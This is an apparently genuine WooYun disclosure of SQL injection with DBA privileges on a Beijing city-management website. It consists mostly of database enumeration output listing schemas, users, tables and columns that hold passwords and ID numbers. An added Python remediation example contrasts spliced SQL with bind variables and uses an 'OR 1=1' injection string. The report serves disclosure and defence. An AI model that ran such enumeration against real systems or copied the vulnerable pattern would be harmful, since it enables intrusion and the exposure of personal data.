Vulnerability Summary

Defect ID: wooyun-2015-0140899

Title: SQL injection at a location of a municipal Urban Management Comprehensive Administrative Law Enforcement Bureau (DBA privileges)

Related vendor: CNCERT (cncert国家互联网应急中心, National Internet Emergency Center)

Author: 路人甲

Submitted: 2015-09-16 21:05

Fixed: 2015-11-02 15:24

Published: 2015-11-02 15:24

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 11

Status: Handed to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2015-09-16: Details sent to the vendor; awaiting vendor response
2015-09-18: CNCERT could not yet reach the responsible unit; details disclosed only to the reporting agency
2015-09-28: Details disclosed to core white hats and domain experts
2015-10-08: Details disclosed to regular white hats
2015-10-18: Details disclosed to intern white hats
2015-11-02: Details disclosed to the public

Brief description:

SQL injection at a location of a municipal Urban Management Comprehensive Administrative Law Enforcement Bureau, with DBA privileges

Detailed description:

SQL injection at a location of the Beijing Municipal Urban Management Comprehensive Administrative Law Enforcement Bureau. The injected query runs with DBA privileges and exposes a large amount of the bureau's sensitive data.
There are 25 databases.
URL: http://**.**.**.**/cgsite.pr.prCgImgDetail.do?imgId=250821
available databases [25]:
[*] AYCGXL
[*] BJOM
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
current schema (equivalent to database on Oracle): 'BJOM'
current user: 'BJOM'
current user is DBA: True
31 users:
database management system users [31]:
[*] ANONYMOUS
[*] AYCGXL
[*] BJOM
[*] CTXSYS
[*] DBSNMP
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_ADM
[*] QS_CB
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKPROXY
[*] WKSYS
[*] WMSYS
[*] XDB

(Screenshots 1.png, 2.png and 5.png omitted)


Proof of vulnerability:

156 tables:
Database: BJOM
[156 tables]
+--------------------------+
| AO_ANSWERS |
| AO_DP_ADDRESSES |
| AO_DRAWPRIZES |
| AO_GIFTS |
| AO_GIFT_CATALOG |
| AO_GRADES |
| AO_QUESTIONS |
| AO_SITES |
| AO_SUBJECTS |
| AO_SYSMANAGERS |
| AO_SYS_CODE |
| AO_USERS |
| AO_USER_ANSWERS |
| AO_USER_PLUS |
| AO_USER_POINTS |
| AO_USER_QUESTIONS |
| BL_BLESS |
| BL_BLESS_VOTE |
| BL_KEYWORDS |
| BNBASEDT_T_PARAMCLASS |
| BNBASEDT_T_PARAMNAME |
| BNBASEDT_T_PARAMVALUE |
| BNCOMMON_T_INFORMATION |
| BNDICT_T_BUSINTYPE |
| BNDICT_T_DICTIONARY |
| BNLOG_T_BUSILOGIC |
| BNLOG_T_LOG |
| BNLOG_T_LOGHISTORY |
| BNREPORT_T_REPORT |
| COLLECT_FILE |
| COLLECT_VOTE_INFO |
| COLLECT_WATERMARK |
| COLLECT_WORK |
| COLL_VIDEO_TIMER |
| CONFIGURATION |
| EG_SYSTEM_PARAMETER |
| EMPLOYEE |
| EOSBIZCATALOG |
| EOSBIZCATALOGDEF |
| EOSDATAPRIVILEGEMODEL |
| EOSEJBREGISTER |
| EOSENTITYDEF |
| EOSFIELDDEF |
| EOSFUNCTION |
| EOSFUNCTIONUNIT |
| EOSMENU |
| EOSOPERATOR |
| EOSOPERATORCONFIG |
| EOSOPERATORROLE |
| EOSORG_T_EMPLOYEE |
| EOSORG_T_EMPORGREF |
| EOSORG_T_EMPPOSITION |
| EOSORG_T_ORGANIZATION |
| EOSORG_T_ORGREF |
| EOSORG_T_POSITION |
| EOSORG_T_POSITIONROLE |
| EOSROLE |
| EOSROLECATALOG |
| EOSROLEDATAPRIVILEGE |
| EOSROLEENTITY |
| EOSROLEFIELD |
| EOSROLEGROUP |
| EOSROLEMENU |
| EOSUNIQUETABLE |
| FBFILE_T_FILE |
| IDSUSER |
| KEYWORDS |
| LLK_ALL_CENT |
| LLK_PASS_CENT |
| LOG_INFO |
| PBCATCOL |
| PBCATEDT |
| PBCATFMT |
| PBCATTBL |
| PBCATVLD |
| PIC_AUDIT_ITEM |
| PIC_CATEGORY |
| PIC_CHANNEL |
| PIC_CHANNEL_LINK |
| PIC_CLICKINFO |
| PIC_CLICKTOTAL |
| PIC_COLLECT |
| PIC_COMMENT |
| PIC_CONFIG_HTML |
| PIC_FILE |
| PIC_HOTMOD_LOG |
| PIC_INFO |
| PIC_INFO_WATERMARK_LINK |
| PIC_MEDIAORIMAGE |
| PIC_MEDIAORUSER |
| PIC_MV_EBEIJING_SEARCH |
| PIC_NOTIFY |
| PIC_PERSONAL_HOME_IMAGE |
| PIC_PERSONAL_HOME_PAGE |
| PIC_PHOTOGRAPHER_RANK |
| PIC_SITE |
| PIC_SITE_LINK |
| PIC_SITE_LINK_TYPE |
| PIC_SOURCE |
| PIC_SUBJECT |
| PIC_SUBJECT_DISPLAY_INFO |
| PIC_SUBJECT_LINK |
| PIC_SUGGEST |
| PIC_TEMPLET |
| PIC_TOP |
| PIC_USER |
| PIC_USER_SITE |
| PIC_WATERMARK |
| PLAN_TABLE |
| SCREEN_MENBERS |
| SCREEN_TEAM |
| TBCATEGORY |
| TBCHECKINFO |
| TBCOMMENT |
| TBKEYWORD |
| TBLANGUAGE |
| TBLOG |
| TBMEDIA |
| TBMEDIA$_TEMP1 |
| TBMEDIASUBJECT |
| TBOPERATION |
| TBSOURCE |
| TBSUBJECT |
| TBUSER |
| TEMP1 |
| TMP_AO_ANSWERS |
| TMP_AO_DRAWPRIZES |
| TMP_AO_GIFTS |
| TMP_AO_GIFT_CATALOG |
| TMP_AO_GRADES |
| TMP_AO_QUESTIONS |
| TMP_AO_SITES |
| TMP_AO_SUBJECTS |
| WFACTIVITYINST |
| WFAGENT |
| WFAGENTITEM |
| WFAGENTSCOPE |
| WFAUDITLOG |
| WFPERSONINFO |
| WFPROCESSCONTROL |
| WFPROCESSDEFINE |
| WFPROCESSINST |
| WFPROCESSINSTATTR |
| WFSYSTEMINFO |
| WFTIMER |
| WFTRANSCTRL |
| WFTRANSITION |
| WFWIPARTICIPANT |
| WFWORKITEM |
| WF_H_ACTIVITYINST |
| WF_H_PROCESSINST |
| WF_H_PROCESSINSTATTR |
| WF_H_TRANSCTRL |
| WF_H_TRANSITION |
| WF_H_WIPARTICIPANT |
| WF_H_WORKITEM |
+--------------------------+
Table: TBUSER
[12 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| ARTIST | NUMBER |
| BIRTHDAY | DATE |
| CITYNAME | VARCHAR2 |
| HOMEPAGE | VARCHAR2 |
| ID | NUMBER |
| LEV | NUMBER |
| MEDIANUMBER | NUMBER |
| NICKNAME | VARCHAR2 |
| PASSWORD | VARCHAR2 |
| PERSON | NUMBER |
| PORTRAIT | VARCHAR2 |
| USERNAME | VARCHAR2 |
+-------------+----------+
used returns 8065 entries
Database: BJOM
Table: PIC_INFO
[20 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| BAK_FOUR | VARCHAR2 |
| BAK_ONE | VARCHAR2 |
| BAK_THREE | VARCHAR2 |
| BAK_TWO | VARCHAR2 |
| CREATE_DATE | DATE |
| CREATE_USER | NUMBER |
| DESC_ | VARCHAR2 |
| HOT_MOD | NUMBER |
| ID | NUMBER |
| IP_ADDRESS | VARCHAR2 |
| IS_PRIME | NUMBER |
| KEYWORDS | VARCHAR2 |
| OPR_NO | NUMBER |
| PIC_CATEGORY_ID | NUMBER |
| PIC_SITE_ID | NUMBER |
| PIC_SOURCE_ID | NUMBER |
| PUBLISH_DATE | DATE |
| SCREEN_TIME | DATE |
| STATUS | VARCHAR2 |
| TITLE | VARCHAR2 |
+-----------------+----------+
Database: BJOM
Table: AO_USERS
[33 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| ADDRESS_ | VARCHAR2 |
| AERA | VARCHAR2 |
| BIRTHEDAY | DATE |
| EMAIL | VARCHAR2 |
| EMAIL_FLAG | VARCHAR2 |
| FAVORITE | VARCHAR2 |
| GIFT_POINTS | NUMBER |
| HOMEPAGE | VARCHAR2 |
| ICON | BLOB |
| ID | NUMBER |
| ID_CARD | VARCHAR2 |
| INTRO | VARCHAR2 |
| IS_VALID | VARCHAR2 |
| LOGIN_ID | VARCHAR2 |
| MOBILE | VARCHAR2 |
| MSN | VARCHAR2 |
| NICK_NAME | VARCHAR2 |
| PASSWARD | VARCHAR2 |
| PHONE | VARCHAR2 |
| PROFESSION | VARCHAR2 |
| PWANSWER | VARCHAR2 |
| PWQUESTION | VARCHAR2 |
| QQ | VARCHAR2 |
| REG_DATE | DATE |
| REMARK | VARCHAR2 |
| SEX | CHAR |
| SIGN | VARCHAR2 |
| STATUS | VARCHAR2 |
| TITLE | VARCHAR2 |
| TOTAL_POINTS | NUMBER |
| TRUE_NAME | VARCHAR2 |
| UPDAT_DATE | DATE |
| ZIP | VARCHAR2 |
+--------------+----------+

(Screenshots 3 (2).png and 4.png omitted)


Remediation:

Filter the input.
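"Filter the input" undersells what the fix needs to be. The report shows a numeric `imgId` query parameter being interpreted as SQL, and the `current user is DBA: True` line shows the application's database account is far more privileged than a picture-detail page needs. The following is an added example, not code from the report or from the affected site: it contrasts the string-splicing pattern the report implies with a handler that validates `imgId` as a positive integer on an allow-list and then passes it as a bind variable. The real application is a Java `.do` front end over Oracle; this example uses Python with an in-memory sqlite3 table as a stand-in so it runs offline. The function names (`img_detail_vulnerable`, `img_detail_hardened`, `parse_img_id`), the three sample rows, and the reduced `PIC_INFO` columns (`ID`, `TITLE`, `PUBLISH_DATE`, which do appear in the report's column list) are constructed for the illustration.

```python
import re
import sqlite3

# Constructed sample data standing in for the BJOM.PIC_INFO table. Only three of
# the twenty columns listed in the report are modelled; the values are invented.
SAMPLE_ROWS = [
    (250821, "Constructed image A", "2015-09-01"),
    (250822, "Constructed image B", "2015-09-02"),
    (250823, "Constructed image C", "2015-09-03"),
]


def build_db() -> sqlite3.Connection:
    """Create an in-memory table so the example runs without Oracle."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE PIC_INFO (ID INTEGER PRIMARY KEY, TITLE TEXT, PUBLISH_DATE TEXT)"
    )
    conn.executemany("INSERT INTO PIC_INFO VALUES (?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def img_detail_vulnerable(conn: sqlite3.Connection, img_id: str) -> list:
    """The pattern the report implies (hypothetical reconstruction, not the
    site's code): the raw imgId parameter is spliced into the SQL text, so
    whatever the client sends is parsed as part of the statement."""
    sql = "SELECT ID, TITLE FROM PIC_INFO WHERE ID = " + img_id
    return conn.execute(sql).fetchall()


# Allow-list for a surrogate key: a positive integer of at most ten digits.
IMG_ID_RE = re.compile(r"^[1-9][0-9]{0,9}$")


def parse_img_id(raw: str) -> int:
    """Reject anything that is not a short positive integer before any SQL
    is built. Raises ValueError on bad input so the caller returns 400."""
    if raw is None or not IMG_ID_RE.fullmatch(raw.strip()):
        raise ValueError("imgId must be a positive integer")
    return int(raw.strip())


def accepts_img_id(raw: str) -> bool:
    """Convenience predicate around parse_img_id for callers and tests."""
    try:
        parse_img_id(raw)
        return True
    except ValueError:
        return False


def img_detail_hardened(conn: sqlite3.Connection, img_id: str) -> list:
    """Validated value passed as a bind variable: it travels as data, never
    as SQL text. On Oracle JDBC the placeholder would be '?' in a
    PreparedStatement (or ':img_id' in a named bind); sqlite3 also uses '?'."""
    value = parse_img_id(img_id)
    return conn.execute(
        "SELECT ID, TITLE FROM PIC_INFO WHERE ID = ?", (value,)
    ).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("hardened, valid id:", img_detail_hardened(db, "250821"))
    print("hardened accepts tautology?", accepts_img_id("250821 OR 1=1"))
    print("vulnerable, tautology:", img_detail_vulnerable(db, "250821 OR 1=1"))
```

The validation step and the bind variable are independent defences; keep both. The bind variable alone already removes the injection, and the allow-list additionally keeps malformed requests out of the database layer and makes them visible in web-server logs as rejected 400s rather than as query errors. Separately from the code, the `current user is DBA: True` finding means the application's Oracle account should be replaced with a least-privilege schema user that can only read the tables the page actually needs, so that any future injection cannot enumerate the other 24 schemas the report lists.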

Copyright notice: when reposting, please credit the source: 路人甲@乌云 (WooYun)


Vulnerability Response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-09-18 15:22

Vendor reply:

CNVD confirmed the described situation. It has been forwarded through CNCERT to the Beijing branch center, which will coordinate handling with the website's administering unit. A copy was also reported to the Beijing municipal government's information technology authority.

Latest status:

None yet